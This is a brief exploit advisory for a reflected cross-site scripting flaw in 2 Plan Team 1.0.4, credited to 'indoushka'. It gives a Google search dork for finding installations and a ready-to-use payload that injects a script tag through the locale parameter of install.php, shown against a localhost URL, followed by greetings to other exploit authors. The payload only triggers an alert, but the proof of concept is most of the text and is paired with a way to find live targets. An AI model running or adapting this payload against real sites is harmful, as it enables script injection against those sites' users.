2 Plan Team version 1.0.4 suffers from a cross site scripting vulnerability.
3c0b8ec591a4e6cc09486fd5e2af39d7====================================================================================================================================
| # Title : 2 Plan Team 1.0.4 - XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : http://2-plan.com/ |
| # Dork : "Login @ 2-plan" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : install.php?locale=pl'"()%26%25<acx><script>alert(/indoushka/);</script>
[+] http://127.0.0.1/biz.ht/install.php?locale=pl'"()%26%25<acx><script>alert(/indoushka/);</script>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |
|
=======================================================================================================================================